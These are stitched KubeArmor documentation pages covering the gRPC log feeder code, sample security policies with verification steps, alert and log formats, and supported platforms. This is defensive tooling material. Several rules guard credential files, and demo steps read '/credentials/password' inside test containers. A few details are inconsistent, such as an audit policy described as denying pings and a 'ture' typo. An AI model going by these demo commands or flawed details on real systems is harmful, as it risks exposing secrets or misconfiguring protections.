QueueSize int // Max size of the channel buffer for each client
EventStructs *EventStructs // Pointer to the feeder's connection store
Running *bool // Pointer to the feeder's running status
}
// WatchAlerts Function (Simplified - gRPC handler)
// This function is called by the gRPC server whenever a client calls the WatchAlerts RPC
func (ls *LogService) WatchAlerts(req *pb.RequestMessage, svr pb.LogService_WatchAlertsServer) error {
// req contains client's request (e.g., filter options)
// svr is the gRPC server stream to send messages back to the client
// Add this client connection to the feeder's connection store
// This creates a new Go channel for this specific client
uid, conn := ls.EventStructs.AddAlertStruct(req.Filter, ls.QueueSize)
kg.Printf("Added a new client (%s, %s) for WatchAlerts", uid, req.Filter)
defer func() {
// This code runs when the client disconnects or an error occurs
close(conn) // Close the channel
ls.EventStructs.RemoveAlertStruct(uid) // Remove from the store
kg.Printf("Deleted the client (%s) for WatchAlerts", uid)
}()
// Loop continuously while KubeArmor is running and the client is connected
for *ls.Running {
select {
case <-svr.Context().Done():
// Client disconnected, exit the loop
return nil
case resp := <-conn:
// A new pb.Alert message arrived on the client's channel (pushed by PushLog)
if err := kl.HandleGRPCErrors(svr.Send(resp)); err != nil {
// Failed to send to the client (e.g., network issue)
kg.Warnf("Failed to send an alert=[%+v] err=[%s]", resp, err.Error())
return err // Exit the loop with an error
}
}
}
return nil // KubeArmor is shutting down, exit gracefully
}
// WatchLogs Function (Simplified - gRPC handler, similar to WatchAlerts)
// This function is called by the gRPC server whenever a client calls the WatchLogs RPC
func (ls *LogService) WatchLogs(req *pb.RequestMessage, svr pb.LogService_WatchLogsServer) error {
// ... Similar logic to WatchAlerts, but uses AddLogStruct, RemoveLogStruct,
// and reads from the LogStructs' Broadcast channel to send pb.Log messages ...
return nil // Simplified
}
Explanation:
LogService
: This struct is the concrete implementation of the gRPC service defined in protobuf/kubearmor.proto
. It holds references to the feeder's state.
WatchAlerts
: This method is a gRPC streaming RPC handler. When a client initiates a WatchAlerts
call, this function is executed. It creates a dedicated Go channel (conn
) for that client using AddAlertStruct
. Then, it enters a for
loop. Inside the loop, it waits for either the client to disconnect (<-svr.Context().Done()
) or for a new pb.Alert
message to appear on the client's dedicated channel (<-conn
). When a message arrives, it sends it over the gRPC stream back to the client using svr.Send(resp)
. This creates the real-time streaming behavior.
WatchLogs
: This method is similar to WatchAlerts
but handles subscriptions for general system logs (pb.Log
messages).
This shows how the Log Feeder's gRPC server manages multiple concurrent client connections, each with its own channel, ensuring that events pushed by PushLog
are delivered to all interested subscribers efficiently.
The most common way to connect to the Log Feeder is using the karmor
command-line tool provided with KubeArmor.
To watch security alerts:
karmor log --alert
To watch system logs:
karmor log --log
To watch both alerts and logs:
karmor log --alert --log
These commands are simply gRPC clients that connect to the KubeArmor Daemon's Log Feeder port on your nodes (or via the KubeArmor Relay service if configured) and call the WatchAlerts
and WatchLogs
gRPC methods.
You can also specify filters (e.g., by namespace or policy name) using karmor log
options, which the Log Feeder's gRPC handlers can process (although the code snippets above show a simplified filter handling).
For integration with other systems, you would write a custom gRPC client application in your preferred language (Go, Python, Java, etc.) using the KubeArmor Protobuf definitions to connect to the feeder and consume the streams.
gRPC Server
Listens for incoming client connections and handles RPC calls.
feeder/feeder.go
Exposes event streams to external clients.
LogService
Implementation of the gRPC service methods (WatchAlerts
, WatchLogs
).
feeder/logServer.go
Manages client connections and streams events.
EventStructs
Internal data structure (maps of channels) holding connections for each client type.
feeder/feeder.go
Enables broadcasting events to multiple clients.
Protobuf Defs
Define the structure of Alert
and Log
messages.
protobuf/kubearmor.proto
Standardizes the output format.
PushLog
method
Method on the Feeder
called by the Daemon to send new events.
feeder/feeder.go
Point of entry for events into the feeder.
The Log Feeder is your essential window into KubeArmor's activity. By collecting enriched security events and telemetry from the System Monitor and Runtime Enforcer, formatting them using Protobuf, and streaming them over a gRPC interface, it provides real-time visibility into policy violations (alerts) and system behavior (logs). Tools like karmor log
and integrations with SIEM systems rely on the Log Feeder to deliver crucial security insights from your KubeArmor-protected environment.
This chapter concludes our detailed look into the core components of KubeArmor! You now have a foundational understanding of how KubeArmor defines policies, identifies workloads, enforces rules, monitors system activity using eBPF, orchestrates these actions with the Daemon, and reports everything via the Log Feeder.
Thank you for following this tutorial series! We hope it has provided a clear and beginner-friendly introduction to the fascinating world of KubeArmor.
Here, we demonstrate how to define security policies using our example microservice (multiubuntu).
Process Execution Restriction
Block a specific executable (ksp-group-1-proc-path-block.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-group-1-proc-path-block
namespace: multiubuntu
spec:
selector:
matchLabels:
group: group-1
process:
matchPaths:
- path: /bin/sleep
action:
Block
Explanation: The purpose of this policy is to block the execution of '/bin/sleep' in the containers with the 'group-1' label. For this, we define the 'group-1' label in selector -> matchLabels and the specific path ('/bin/sleep') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please get into one of the containers with the 'group-1' (using "kubectl -n multiubuntu exec -it ubuntu-X-deployment-... -- bash") and run '/bin/sleep'. You will see that /bin/sleep is blocked.
Block accessing specific executable matching labels, In & NotIn operator (ksp-match-expression-in-notin-block-process.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-match-expression-in-notin-block-process
namespace: multiubuntu
spec:
severity: 5
message: "block execution of a matching binary name"
selector:
matchExpressions:
- key: label
operator: In
values:
- container=ubuntu-1
- key: label
operator: NotIn
values:
- container=ubuntu-3
process:
matchPaths:
- execname: apt
action:
Block
Explanation: The purpose of this policy is to block the execution of 'apt' binary in all the workloads in the namespace multiubuntu
, who contains label container=ubuntu-1
. For this, we define the 'container=ubuntu-1' as value and operator as 'In' for key label
in selector -> matchExpressions and the specific execname ('apt') in process -> matchPaths. The other expression container=ubuntu-3
value and operator as 'NotIn' for key label
is not mandatory because if we mention something in 'In' operator, everything else is just not slected for matching. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please exec into any container who contains label container=ubuntu-1
within the namespace 'multiubuntu' and run 'apt'. You can see the binary is blocked. Then try to do same in other workloads who doesn't contains label container=ubuntu-1
, the binary won't be blocked.
Block accessing specific executable matching labels, NotIn operator (ksp-match-expression-notin-block-process.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-match-expression-notin-block-process
namespace: multiubuntu
spec:
severity: 5
message: "block execution of a matching binary name"
selector:
matchExpressions:
- key: label
operator: NotIn
values:
- container=ubuntu-1
process:
matchPaths:
- execname: apt
action:
Block
Explanation: The purpose of this policy is to block the execution of 'apt' binary in all the workloads in the namespace multiubuntu
, who doesn't contains label container=ubuntu-1
. For this, we define the 'container=ubuntu-1' as value and operator as 'In' for key label
in selector -> matchExpressions and the specific execname ('apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please exec into any container who contains label container=ubuntu-1
within the namespace 'multiubuntu' and run 'apt'. You can see the binary is not blocked. Then try to do same in other workloads who doesn't contains label container=ubuntu-1
, the binary will be blocked.
Block all executables in a specific directory (ksp-ubuntu-1-proc-dir-block.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-1-proc-dir-block
namespace: multiubuntu
spec:
selector:
matchLabels:
container: ubuntu-1
process:
matchDirectories:
- dir: /sbin/
action:
Block
Explanation: The purpose of this policy is to block all executables in the '/sbin' directory. Since we want to block all executables rather than a specific executable, we use matchDirectories to specify the executables in the '/sbin' directory at once.
Verification: After applying this policy, please get into the container with the 'ubuntu-1' label and run '/sbin/route' to see if this command is allowed (this command will be blocked).
Block all executables in a specific directory and its subdirectories (ksp-ubuntu-2-proc-dir-recursive-block.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-2-proc-dir-recursive-block
namespace: multiubuntu
spec:
selector:
matchLabels:
container: ubuntu-2
process:
matchDirectories:
- dir: /usr/
recursive: true
action:
Block
Explanation: As the extension of the previous policy, we want to block all executables in the '/usr' directory and its subdirectories (e.g., '/usr/bin', '/usr/sbin', and '/usr/local/bin'). Thus, we add 'recursive: true' to extend the scope of the policy.
Verification: After applying this policy, please get into the container with the 'ubuntu-2' label and run '/usr/bin/env' or '/usr/bin/whoami'. You will see that those commands are blocked.
Allow specific executables to access certain files only (ksp-ubuntu-3-file-dir-allow-from-source-path.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-3-file-dir-allow-from-source-path
namespace: multiubuntu
spec:
severity: 10
message: "a critical directory was accessed"
tags:
- WARNING
selector:
matchLabels:
container: ubuntu-3
file:
matchDirectories:
- dir: /credentials/
fromSource:
- path: /bin/cat
action:
Allow
Explanation: Here, we want the container with the 'ubuntu-3' label only to access certain files by specific executables. Otherwise, we want to block any other file accesses. To achieve this goal, we define the scope of this policy using matchDirectories with fromSource and use the 'Allow' action.
Verification: In this policy, we allow /bin/cat to access the files in /credentials only. After applying this policy, please get into the container with the 'ubuntu-3' label and run 'cat /credentials/password'. This command will be allowed with no errors. Now, please run 'cat /etc/hostname'. Then, this command will be blocked since /bin/cat is only allowed to access /credentials/*.
Allow a specific executable to be launched by its owner only (ksp-ubuntu-3-proc-path-owner-allow.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-3-proc-path-owner-allow
namespace: multiubuntu
spec:
severity: 7
selector:
matchLabels:
container: ubuntu-3
process:
matchPaths:
- path: /home/user1/hello
ownerOnly: true
matchDirectories:
- dir: /bin/ # required to change root to user1
recursive: true
- dir: /usr/bin/ # used in changing accounts
recursive: true
file:
matchPaths:
- path: /root/.bashrc # used by root
- path: /root/.bash_history # used by root
- path: /home/user1/.profile # used by user1
- path: /home/user1/.bashrc # used by user1
- path: /run/utmp # required to change root to user1
- path: /dev/tty
matchDirectories:
- dir: /etc/ # required to change root to user1 (coarse-grained way)
recursive: true
- dir: /proc/ # required to change root to user1 (coarse-grained way)
recursive: true
action:
Allow
Explanation: This policy aims to allow a specific user (i.e., user1) only to launch its own executable (i.e., hello), which means that we do not want for the root user to even launch /home/user1/hello. For this, we define a security policy with matchPaths and 'ownerOnly: ture'.
Verification: For verification, we also allow several directories and files to change users (from 'root' to 'user1') in the policy. After applying this policy, please get into the container with the 'ubuntu-3' label and run '/home/user1/hello' first. This command will be blocked even though you are the 'root' user. Then, please run 'su - user1'. Now, you are the 'user1' user. Please run '/home/user1/hello' again. You will see that it works now.
File Access Restriction
Allow accessing specific files only (ksp-ubuntu-4-file-path-readonly-allow.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-4-file-path-readonly-allow
namespace: multiubuntu
spec:
severity: 10
message: "a critical file was accessed"
tags:
- WARNING
selector:
matchLabels:
container: ubuntu-4
process:
matchDirectories:
- dir: /bin/ # used by root
recursive: true
- dir: /usr/bin/ # used by root
recursive: true
file:
matchPaths:
- path: /credentials/password
readOnly: true
- path: /root/.bashrc # used by root
- path: /root/.bash_history # used by root
- path: /dev/tty
matchDirectories:
- dir: /etc/ # used by root (coarse-grained way)
recursive: true
- dir: /proc/ # used by root (coarse-grained way)
recursive: true
action:
Allow
Explanation: The purpose of this policy is to allow the container with the 'ubuntu-4' label to read '/credentials/password' only (the write operation is blocked).
Verification: After applying this policy, please get into the container with the 'ubuntu-4' label and run 'cat /credentials/password'. You can see the contents in the file. Now, please run 'echo "test" >> /credentials/password'. You will see that the write operation will be blocked.
Block all file accesses in a specific directory and its subdirectories (ksp-ubuntu-5-file-dir-recursive-block.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-5-file-dir-recursive-block
namespace: multiubuntu
spec:
selector:
matchLabels:
container: ubuntu-5
file:
matchDirectories:
- dir: /credentials/
recursive: true
action:
Block
Explanation: In this policy, we do not want the container with the 'ubuntu-5' label to access any files in the '/credentials' directory and its subdirectories. Thus, we use 'matchDirectories' and 'recursive: true' to define all files in the '/credentials' directory and its subdirectories.
Verification: After applying this policy, please get into the container with the 'ubuntu-5' label and run 'cat /secret.txt'. You will see the contents of /secret.txt. Then, please run 'cat /credentials/password'. This command will be blocked due to the security policy.
Network Operation Restriction
Audit ICMP packets (ksp-ubuntu-5-net-icmp-audit)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-5-net-icmp-audit
namespace: multiubuntu
spec:
severity: 8
selector:
matchLabels:
container: ubuntu-5
network:
matchProtocols:
- protocol: icmp
action:
Audit
Explanation: We want to audit sending ICMP packets from the containers with the 'ubuntu-5' label while allowing packets for the other protocols (e.g., TCP and UDP). For this, we use 'matchProtocols' to define the protocol (i.e., ICMP) that we want to block.
Verification: After applying this policy, please get into the container with the 'ubuntu-5' label and run 'curl https://kubernetes.io/'. This will work fine. Then, run 'ping 8.8.8.8'. You will see 'Permission denied' since the 'ping' command internally uses the ICMP protocol.
Capabilities Restriction
Block Raw Sockets (i.e., non-TCP/UDP packets) (ksp-ubuntu-1-cap-net-raw-block.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-1-cap-net-raw-block
namespace: multiubuntu
spec:
severity: 1
selector:
matchLabels:
container: ubuntu-1
capabilities:
matchCapabilities:
- capability: net_raw
action:
Block
Explanation: We want to block any network operations using raw sockets from the containers with the 'ubuntu-1' label, meaning that containers cannot send non-TCP/UDP packets (e.g., ICMP echo request or reply) to other containers. To achieve this, we use matchCapabilities and specify the 'CAP_NET_RAW' capability to block raw socket creations inside the containers. Here, since we use the stream and datagram sockets to TCP and UDP packets respectively, we can still send those packets to others.
Verification: After applying this policy, please get into the container with the 'ubuntu-1' label and run 'curl https://kubernetes.io/'. This will work fine. Then, run 'ping 8.8.8.8'. You will see 'Operation not permitted' since the 'ping' command internally requires a raw socket to send ICMP packets.
System calls alerting
Alert for all unlink
syscalls
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: audit-all-unlink
namespace: default
spec:
severity: 3
selector:
matchLabels:
container: ubuntu-1
syscalls:
matchSyscalls:
- syscall:
- unlink
action:
Audit
Alert on all rmdir
syscalls targeting anything in /home/
directory and sub-directories
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: audit-home-rmdir
namespace: default
spec:
selector:
matchLabels:
container: ubuntu-1
syscalls:
matchPaths:
- syscall:
- rmdir
path: /home/
recursive: true
action:
Audit
Native Json format (this document)
KubeArmor CEF Format (coming soon...)
Container alerts are generated when there is a policy violation or audit event that is raised due to a policy action. For example, a policy might block execution of a process. When the execution is blocked by KubeArmor enforcer, KubeArmor generates an alert event implying policy action. In the case of an Audit action, the KubeArmor will only generate an alert without actually blocking the action.
The primary difference in the container alerts events vs the telemetry events (showcased above) is that the alert events contains certain additional fields such as policy name because of which the alert was generated and other metadata such as "Tags", "Message", "Severity" associated with the policy rule.
The fields are self-explanatory and have similar meaning as in the context of container based events (explained above).
ClusterName
gives information about the cluster for which the log was generated
default
Operation
gives details about what type of operation happened in the pod
File/Process/ Network
ContainerID
information about the container ID from where log was generated
7aca8d52d35ab7872df6a454ca32339386be
ContainerImage
shows the image that was used to spin up the container
docker.io/accuknox/knoxautopolicy:v0.9@sha256:bb83b5c6d41e0d0aa3b5d6621188c284ea
ContainerName
specifies the Container name where the log got generated
discovery-engine
Data
shows the system call that was invoked for this operation
syscall=SYS_OPENAT fd=-100 flags=O_RDWR|O_CREAT|O_NOFOLLOW|O_CLOEXEC
HostName
shows the node name where the log got generated
aks-agentpool-16128849-vmss000001
HostPID
gives the host Process ID
967872
HostPPID
list the details of host Parent Process ID
967496
Labels
shows the pod label from where log generated
app=discovery-engine
Message
gives the message specified in the policy
Alert! Execution of package management process inside container is denied
NamespaceName
lists the namespace where pod is running
accuknox-agents
PID
lists the process ID running in container
1
PPID
lists the Parent process ID running in container
967496
ParentProcessName
gives the parent process name from where the operation happend
/usr/bin/containerd-shim-runc-v2
PodName
lists the pod name where the log got generated
mysql-76ddc6ddc4-h47hv
ProcessName
specifies the operation that happened inside the pod for this log
/knoxAutoPolicy
Resource
lists the resources that was requested
//accuknox-obs.db
Result
shows whether the event was allowed or denied
Passed
Source
lists the source from where the operation request came
/knoxAutoPolicy
Type
specifies it as container log
ContainerLog
{
"ClusterName": "default",
"HostName": "aks-agentpool-16128849-vmss000000",
"NamespaceName": "default",
"PodName": "vault-0",
"Labels": "app.kubernetes.io/instance=vault,app.kubernetes.io/name=vault,component=server,helm.sh/chart=vault-0.24.1,statefulset.kubernetes.io/pod-name=vault-0",
"ContainerID": "775fb27125ee8d9e2f34d6731fbf3bf677a1038f79fe8134856337612007d9ae",
"ContainerName": "vault",
"ContainerImage": "docker.io/hashicorp/vault:1.13.1@sha256:b888abc3fc0529550d4a6c87884419e86b8cb736fe556e3e717a6bc50888b3b8",
"ParentProcessName": "/usr/bin/runc",
"ProcessName": "/bin/sh",
"HostPPID": 2514065,
"HostPID": 2514068,
"PPID": 2514065,
"PID": 3552620,
"UID": 100,
"Type": "ContainerLog",
"Source": "/usr/bin/runc",
"Operation": "Process",
"Resource": "/bin/sh -ec vault status -tls-skip-verify",
"Data": "syscall=SYS_EXECVE",
"Result": "Passed"
}
{
"ClusterName": "default",
"HostName": "aks-agentpool-16128849-vmss000000",
"NamespaceName": "accuknox-agents",
"PodName": "discovery-engine-6f5c4df7b4-q8zbc",
"Labels": "app=discovery-engine",
"ContainerID": "7aca8d52d35ab7872df6a454ca32339386be755d9ed6bd6bf7b37ec6aaf277e4",
"ContainerName": "discovery-engine",
"ContainerImage": "docker.io/accuknox/knoxautopolicy:v0.9@sha256:bb83b5c6d41e0d0aa3b5d6621188c284ea99741c3692e34b0f089b0e74745413",
"ParentProcessName": "/usr/bin/containerd-shim-runc-v2",
"ProcessName": "/knoxAutoPolicy",
"HostPPID": 967496,
"HostPID": 967872,
"PPID": 967496,
"PID": 1,
"Type": "ContainerLog",
"Source": "/knoxAutoPolicy",
"Operation": "File",
"Resource": "/var/run/secrets/kubernetes.io/serviceaccount/token",
"Data": "syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_CLOEXEC",
"Result": "Passed"
}
{
"ClusterName": "default",
"HostName": "aks-agentpool-16128849-vmss000001",
"NamespaceName": "accuknox-agents",
"PodName": "policy-enforcement-agent-7946b64dfb-f4lgv",
"Labels": "app=policy-enforcement-agent",
"ContainerID": "b597629c9b59304c779c51839e9a590fa96871bdfdf55bfec73b26c9fb7647d7",
"ContainerName": "policy-enforcement-agent",
"ContainerImage": "public.ecr.aws/k9v9d5v2/policy-enforcement-agent:v0.1.0@sha256:005c1fde3ff8a667f3ac7540c5c011c752a7e3aaa2c89aa335703289ed8d80f8",
"ParentProcessName": "/usr/bin/containerd-shim-runc-v2",
"ProcessName": "/home/pea/main",
"HostPPID": 1394403,
"HostPID": 1394554,
"PPID": 1394403,
"PID": 1,
"Type": "ContainerLog",
"Source": "./main",
"Operation": "Network",
"Resource": "sa_family=AF_INET sin_port=53 sin_addr=10.0.0.10",
"Data": "syscall=SYS_CONNECT fd=10",
"Result": "Passed"
}
Action
specifies the action of the policy it has matched.
Audit/Block
ClusterName
gives information about the cluster for which the alert was generated
aks-test-cluster
Operation
gives details about what type of operation happened in the pod
File/Process/Network
ContainerID
information about the container ID where the policy violation or alert got generated
e10d5edb62ac2daa4eb9a2146e2f2cfa87b6a5f30bd3a
ContainerImage
shows the image that was used to spin up the container
docker.io/library/mysql:5.6@sha256:20575ecebe6216036d25dab5903808211f
ContainerName
specifies the Container name where the alert got generated
mysql
Data
shows the system call that was invoked for this operation
syscall=SYS_EXECVE
Enforcer
it specifies the name of the LSM that has enforced the policy
AppArmor/BPFLSM
HostName
shows the node name where the alert got generated
aks-agentpool-16128849-vmss000001
HostPID
gives the host Process ID
3647533
HostPPID
list the details of host Parent Process ID
3642706
Labels
shows the pod label from where alert generated
app=mysql
Message
gives the message specified in the policy
Alert! Execution of package management process inside container is denied
NamespaceName
lists the namespace where pod is running
wordpress-mysql
PID
lists the process ID running in container
266
PPID
lists the Parent process ID running in container
251
ParentProcessName
gives the parent process name from where the operation happend
/bin/bash
PodName
lists the pod name where the alert got generated
mysql-76ddc6ddc4-h47hv
PolicyName
gives the policy that was matched for this alert generation
harden-mysql-pkg-mngr-exec
ProcessName
specifies the operation that happened inside the pod for this alert
/usr/bin/apt
Resource
lists the resources that was requested
/usr/bin/apt
Result
shows whether the event was allowed or denied
Permission denied
Severity
gives the severity level of the operation
5
Source
lists the source from where the operation request came
/bin/bash
Tags
specifies the list of benchmarks this policy satisfies
NIST,NIST_800-53_CM-7(4),SI-4,process,NIST_800-53_SI-4
Timestamp
gives the details of the time this event tried to happen
1687868507
Type
shows whether policy matched or default posture alert
MatchedPolicy
UpdatedTime
gives the time of this alert
2023-06-27T12:21:47.932526
cluster_id
specifies the cluster id where the alert was generated
596
component_name
gives the component which generated this log/alert
kubearmor
tenant_id
specifies the tenant id where this cluster is onboarded in AccuKnox SaaS
11
{
"ClusterName": "default",
"HostName": "aks-agentpool-16128849-vmss000001",
"NamespaceName": "wordpress-mysql",
"PodName": "wordpress-787f45786f-2q9wf",
"Labels": "app=wordpress",
"ContainerID": "72de193fc8d849cd052affae5a53a27111bcefb75385635dcb374acdf31a5548",
"ContainerName": "wordpress",
"ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
"HostPPID": 495804,
"HostPID": 495877,
"PPID": 309835,
"PID": 309841,
"ParentProcessName": "/bin/bash",
"ProcessName": "/usr/bin/apt",
"PolicyName": "harden-wordpress-pkg-mngr-exec",
"Severity": "5",
"Tags": "NIST,NIST_800-53_CM-7(4),SI-4,process,NIST_800-53_SI-4",
"ATags": [
"NIST",
"NIST_800-53_CM-7(4)",
"SI-4",
"process",
"NIST_800-53_SI-4"
],
"Message": "Alert! Execution of package management process inside container is denied",
"Type": "MatchedPolicy",
"Source": "/bin/bash",
"Operation": "Process",
"Resource": "/usr/bin/apt",
"Data": "syscall=SYS_EXECVE",
"Enforcer": "AppArmor",
"Action": "Block",
"Result": "Permission denied"
}
{
"ClusterName": "default",
"HostName": "aks-agentpool-16128849-vmss000001",
"NamespaceName": "wordpress-mysql",
"PodName": "wordpress-787f45786f-2q9wf",
"Labels": "app=wordpress",
"ContainerID": "72de193fc8d849cd052affae5a53a27111bcefb75385635dcb374acdf31a5548",
"ContainerName": "wordpress",
"ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
"HostPPID": 495804,
"HostPID": 496390,
"PPID": 309835,
"PID": 309842,
"ParentProcessName": "/bin/bash",
"ProcessName": "/bin/rm",
"PolicyName": "harden-wordpress-file-integrity-monitoring",
"Severity": "1",
"Tags": "NIST,NIST_800-53_AU-2,NIST_800-53_SI-4,MITRE,MITRE_T1036_masquerading,MITRE_T1565_data_manipulation",
"ATags": [
"NIST",
"NIST_800-53_AU-2",
"NIST_800-53_SI-4",
"MITRE",
"MITRE_T1036_masquerading",
"MITRE_T1565_data_manipulation"
],
"Message": "Detected and prevented compromise to File integrity",
"Type": "MatchedPolicy",
"Source": "/bin/rm /sbin/raw",
"Operation": "File",
"Resource": "/sbin/raw",
"Data": "syscall=SYS_UNLINKAT flags=",
"Enforcer": "AppArmor",
"Action": "Block",
"Result": "Permission denied"
}
{
"ClusterName": "default",
"HostName": "aks-agentpool-16128849-vmss000000",
"NamespaceName": "default",
"PodName": "vault-0",
"Labels": "app.kubernetes.io/instance=vault,app.kubernetes.io/name=vault,component=server,helm.sh/chart=vault-0.24.1,statefulset.kubernetes.io/pod-name=vault-0",
"ContainerID": "775fb27125ee8d9e2f34d6731fbf3bf677a1038f79fe8134856337612007d9ae",
"ContainerName": "vault",
"ContainerImage": "docker.io/hashicorp/vault:1.13.1@sha256:b888abc3fc0529550d4a6c87884419e86b8cb736fe556e3e717a6bc50888b3b8",
"HostPPID": 2203523,
"HostPID": 2565259,
"PPID": 2203523,
"PID": 3558570,
"UID": 100,
"ParentProcessName": "/usr/bin/containerd-shim-runc-v2",
"ProcessName": "/bin/vault",
"PolicyName": "ksp-vault-network",
"Severity": "8",
"Type": "MatchedPolicy",
"Source": "/bin/vault status -tls-skip-verify",
"Operation": "Network",
"Resource": "domain=AF_UNIX type=SOCK_STREAM|SOCK_NONBLOCK|SOCK_CLOEXEC protocol=0",
"Data": "syscall=SYS_SOCKET",
"Enforcer": "eBPF Monitor",
"Action": "Audit",
"Result": "Passed"
}
{
"Timestamp": 1692813948,
"UpdatedTime": "2023-08-23T18:05:48.301798Z",
"ClusterName": "default",
"HostName": "gke-my-first-cluster-1-default-pool-9144db50-81gb",
"HostPPID": 1979,
"HostPID": 1787227,
"PPID": 1979,
"PID": 1787227,
"ParentProcessName": "/bin/bash",
"ProcessName": "/bin/sleep",
"PolicyName": "sleep-deny",
"Severity": "5",
"Type": "MatchedHostPolicy",
"Source": "/bin/bash",
"Operation": "Process",
"Resource": "/usr/bin/sleep 10",
"Data": "syscall=SYS_EXECVE",
"Enforcer": "BPFLSM",
"Action": "Block",
"Result": "Permission denied"
}
{
"Timestamp": 1692814089,
"UpdatedTime": "2023-08-23T18:08:09.522743Z",
"ClusterName": "default",
"HostName": "gke-my-first-cluster-1-default-pool-9144db50-81gb",
"HostPPID": 1791315,
"HostPID": 1791316,
"PPID": 1791315,
"PID": 1791316,
"UID": 204,
"ParentProcessName": "/usr/sbin/sshd",
"ProcessName": "/usr/sbin/sshd",
"PolicyName": "DefaultPosture",
"Type": "MatchedHostPolicy",
"Source": "/usr/sbin/sshd",
"Operation": "Syscall",
"Data": "syscall=SYS_SETGID userid=0",
"Enforcer": "BPFLSM",
"Action": "Block",
"Result": "Operation not permitted"
}
{
"Timestamp": 1692814089,
"UpdatedTime": "2023-08-23T18:08:09.523964Z",
"ClusterName": "default",
"HostName": "gke-my-first-cluster-1-default-pool-9144db50-81gb",
"HostPPID": 1791315,
"HostPID": 1791316,
"PPID": 1791315,
"PID": 1791316,
"UID": 204,
"ParentProcessName": "/usr/sbin/sshd",
"ProcessName": "/usr/sbin/sshd",
"PolicyName": "DefaultPosture",
"Type": "MatchedHostPolicy",
"Source": "/usr/sbin/sshd",
"Operation": "Syscall",
"Data": "syscall=SYS_SETUID userid=0",
"Enforcer": "BPFLSM",
"Action": "Block",
"Result": "Operation not permitted"
}
KubeArmor supports following types of workloads:
K8s orchestrated: Workloads deployed as k8s orchestrated containers. In this case, Kubearmor is deployed as a k8s daemonset. Note, KubeArmor supports policy enforcement on both k8s-pods (KubeArmorPolicy) as well as k8s-nodes (KubeArmorHostPolicy).
Containerized: Workloads that are containerized but not k8s orchestrated are supported. KubeArmor installed in systemd mode can be used to protect such workloads.
VM/Bare-Metals: Workloads deployed on Virtual Machines or Bare Metal i.e. workloads directly operating as host/system processes. In this case, Kubearmor is deployed in systemd mode.
Provider
K8s engine
OS Image
Arch
Audit Rules
Blocking Rules
LSM Enforcer
Remarks
Onprem
kubeadm, , , microk8s
x86_64, ARM
✔️
✔️
✔️
✔️
, AppArmor
x86_64
✔️
✔️
✔️
✔️
, AppArmor
All
Ubuntu >= 16.04
x86_64
✔️
✔️
✔️
✔️
, AppArmor
All
Microsoft
Ubuntu >= 18.04
x86_64
✔️
✔️
✔️
✔️
, AppArmor
Oracle
>=7
x86_64
✔️
✔️
✔️
✔️
IBM
Ubuntu
x86_64
✔️
✔️
✔️
✔️
, AppArmor
Talos
Talos
x86_64
✔️
✔️
✔️
✔️
AWS
Amazon Linux 2 (kernel >=5.8)
x86_64
✔️
✔️
✔️
✔️
AWS
Ubuntu
x86_64
✔️
✔️
✔️
✔️
AppArmor
AWS
x86_64
✔️
✔️
✔️
✔️
AWS
x86_64
✔️
✔️
✔️
✔️
AWS
Ubuntu
ARM
✔️
✔️
✔️
✔️
AppArmor
AWS
Amazon Linux 2
ARM
✔️
✔️
❌
✔️
SELinux
RedHat
<=8.4
x86_64
✔️
✔️
❌
✔️
SELinux
RedHat
>=8.5
x86_64
✔️
✔️
✔️
✔️
RedHat
>=9.2
x86_64
✔️
✔️
✔️
✔️
Rancher
x86_64
✔️
✔️
✔️
✔️
, AppArmor
Rancher
x86_64
✔️
✔️
✔️
✔️
, AppArmor
Oracle
ARM
✔️
✔️
❌
✔️
SELinux
VMware
TBD
x86_64
🚧
🚧
🚧
🚧
🚧
Mirantis
Ubuntu>=20.04
x86_64
✔️
✔️
✔️
✔️
AppArmor
Digital Ocean
Debian GNU/Linux 11 (bullseye)
x86_64
✔️
✔️
✔️
✔️
Alibaba Cloud
Alibaba Cloud Linux 3.2104 LTS
x86_64
✔️
✔️
✔️
✔️
Following distributions are tested for VM/Bare-metal based installations:
SUSE
SUSE Enterprise 15
Full
Full
Debian
/
Full
Full
Ubuntu
18.04 / 16.04 / 20.04
Full
Full
RedHat / CentOS
RHEL / CentOS <= 8.4
Full
Partial
RedHat / CentOS
RHEL / CentOS >= 8.5
Full
Full
Fedora
Fedora 34 / 35
Full
Full
Rocky Linux
Rocky Linux >= 8.5
Full
Full
AWS
Amazon Linux 2022
Full
Full
AWS
Amazon Linux 2023
Full
Full
RaspberryPi (ARM)
Debian
Full
Full
ArchLinux
ArchLinux-6.2.1
Full
Full
Alibaba
Alibaba Cloud Linux 3.2104 LTS 64 bit
Full
Full
Note Full: Supports both enforcement and observability Partial: Supports only observability
Please approach the Kubearmor community on slack or raise a GitHub issue to express interest in adding the support.
It would be very much appreciated if you can test kubearmor on a platform not listed above and if you have access to. Once tested you can update this document and raise a PR.
